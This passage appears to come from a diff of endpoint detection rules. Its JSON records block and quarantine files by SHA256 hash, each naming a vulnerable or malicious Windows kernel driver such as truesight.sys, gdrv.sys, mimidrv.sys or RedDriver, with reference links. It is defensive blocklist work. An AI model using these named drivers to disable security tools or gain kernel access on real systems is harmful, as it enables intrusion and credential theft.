+ "hl_testing_start_time": "2026-03-23T11:45:29.979002Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e0124fcc7c95fdc34408cf154cb41e654dade8b898c71ad587b2090b1da30d7",
+ "comment": "Vulnerable Kernel Driver (aka PanMonFlt.sys) [https://www.loldrivers.io/drivers/cfdc5cb4-be5c-4dcc-a883-825fa72115b4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bce01599-c641-5086-a0b7-3fb2ffe52c23",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828530Z",
+ "creation_date": "2026-03-23T11:45:31.828532Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828537Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b68e91f11b63ed6b2caa8b8c03bcc5b28210fdf36fab9ce1d9706fb8e9e5285",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bce30193-0a7c-5256-8365-382d9c2b9fe5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494600Z",
+ "creation_date": "2026-03-23T11:45:31.494602Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494608Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bce14e5016db8663b596dadca0e015ff9a067b79f160ef7bbab9b3db0035bfd5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bce7a2ff-307a-5412-a8e6-8f6f79c2d373",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494674Z",
+ "creation_date": "2026-03-23T11:45:31.494675Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494681Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e25cdb818e9d00ec76d9d9629c9e25878a7b24391f3bd74d848ae369aea7e381",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bced4887-af6e-5e73-904c-d6248d1f8623",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465340Z",
+ "creation_date": "2026-03-23T11:45:30.465343Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465351Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d032001eab6cad4fbef19aab418650ded00152143bd14507e17d62748297c23f",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bcf3791a-24c1-5d9f-a703-540502e0d76d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813272Z",
+ "creation_date": "2026-03-23T11:45:31.813274Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813282Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e655b8c85566dc7158cb381a0c045fe5e37614a3e6a6bd856884583a05217d1a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bcf68611-1727-5f3e-beb2-0284c7e762e7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827508Z",
+ "creation_date": "2026-03-23T11:45:30.827510Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827515Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "69ae4f18c56e45904550ed993c4b177bf2ade201b94e6a3307dbfae8a5747cc4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bcfda42b-da19-5e1c-94c7-cdf817174cd8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156620Z",
+ "creation_date": "2026-03-23T11:45:31.156622Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156628Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f3cfa1b06a0aa138c7c65e8c9a796592e04bd6ec2ed245fd27f512df0996ef25",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd059a01-bd8f-5f9a-b2ec-2193df342840",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606687Z",
+ "creation_date": "2026-03-23T11:45:29.606689Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606695Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28f82b626697dcdccdcc1dee693e9f5c0e605f794f93bb04a3bb80cf0e9f0601",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd07fe6f-3d62-5a5e-9cb3-09bf20ffec0d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822600Z",
+ "creation_date": "2026-03-23T11:45:30.822602Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822607Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df1fa63048807a9372a9b29baa712ef3c448ae28fc2c7da559714e40b1321a4d",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd149903-88ca-5cc4-a923-d8de6639499d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609058Z",
+ "creation_date": "2026-03-23T11:45:29.609060Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609066Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f1fc8287dd8d724972d7a165683f2b2ad6837e16f09fe292714e8e38ecd1e38",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd1c7056-6de1-5e1a-9e52-5e729d415158",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145325Z",
+ "creation_date": "2026-03-23T11:45:31.145327Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145332Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4133b502bddff463b1f8555bb3e67c607a13a2920e8d80e5d42616a212035fa4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd28842c-cc9a-5f1c-bf04-17e77c85d351",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475188Z",
+ "creation_date": "2026-03-23T11:45:30.475192Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475200Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0381632cd236cd94fa9e64ccc958516ac50f9437f99092e231a607b1e6be6cf8",
+ "comment": "Vulnerable Kernel Driver (aka bs_rcio64.sys) [https://www.loldrivers.io/drivers/cacf18a5-6d7d-4a63-92d4-bda386a3da18/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd2a54c9-39a4-5d07-81a5-7354b00b57a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836523Z",
+ "creation_date": "2026-03-23T11:45:30.836525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "45962808c890a618c9552c9412e249e8f477cc4d426ba4037bd828f7ee603569",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd33f6f1-622c-5313-8993-e662fa2fc3a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819295Z",
+ "creation_date": "2026-03-23T11:45:30.819297Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819303Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43136de6b77ef85bc661d401723f38624e93c4408d758bc9f27987f2b4511fee",
+ "comment": "Vulnerable Kernel Driver (aka hwdetectng.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd3ec56f-017e-5d28-ba5f-a2e6ac69bee5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457718Z",
+ "creation_date": "2026-03-23T11:45:30.457721Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457731Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c6389dca278be297b95846badc2b6859b488f123dbdc5d7bfc6f4393eeb7e678",
+ "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd41f12c-3491-5d38-887d-3dce22660146",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464090Z",
+ "creation_date": "2026-03-23T11:45:30.464093Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464102Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c4f041de66ec8cc5ab4a03bbc46f99e073157a4e915a9ab4069162de834ffc5c",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd43a33c-8907-50be-9143-ff3fd494b642",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152750Z",
+ "creation_date": "2026-03-23T11:45:31.152753Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152761Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bedf7bf28b9f330e16311668e2adda26e62008113a74db2880691f38e62fbf02",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd562f90-c592-56d5-8e9d-d6778bb32445",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619126Z",
+ "creation_date": "2026-03-23T11:45:29.619128Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619133Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a37371c4e62f106e7da03fd5bdd6f12ecdf7fcaf1195dbf9fb7ef6eb456a7506",
+ "comment": "Vulnerable Kernel Driver (aka amp.sys) [https://www.loldrivers.io/drivers/ca768fc5-9b5c-4ced-90ab-fd6be9a70199/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd596d3a-fc5f-511e-915c-44c13a83667a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827751Z",
+ "creation_date": "2026-03-23T11:45:30.827753Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827759Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40f6650ac8f07f2c1a76376940743c46d7a81364d4dd04c625691f3752aec4ef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd5de4cb-9a5b-5857-b284-c9b7f84851ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.986083Z",
+ "creation_date": "2026-03-23T11:45:29.986085Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986091Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81f4258c5aee1bfe424880fbc61a1928a816014c502f010be03becbb42e648fb",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd638b77-aa52-58dd-9059-c1d7450be29a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815840Z",
+ "creation_date": "2026-03-23T11:45:30.815842Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815848Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ebf0e56a1941e3a6583aab4a735f1b04d4750228c18666925945ed9d7c9007e1",
+ "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bd7635fa-20ae-51ce-8e45-f3ebc2196b1e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619733Z",
+ "creation_date": "2026-03-23T11:45:29.619735Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619740Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9c60f560440ff16ad3c767ff5b7658d5bda61ea1166efe9b7f450447557136e",
+ "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [file SHA256]",
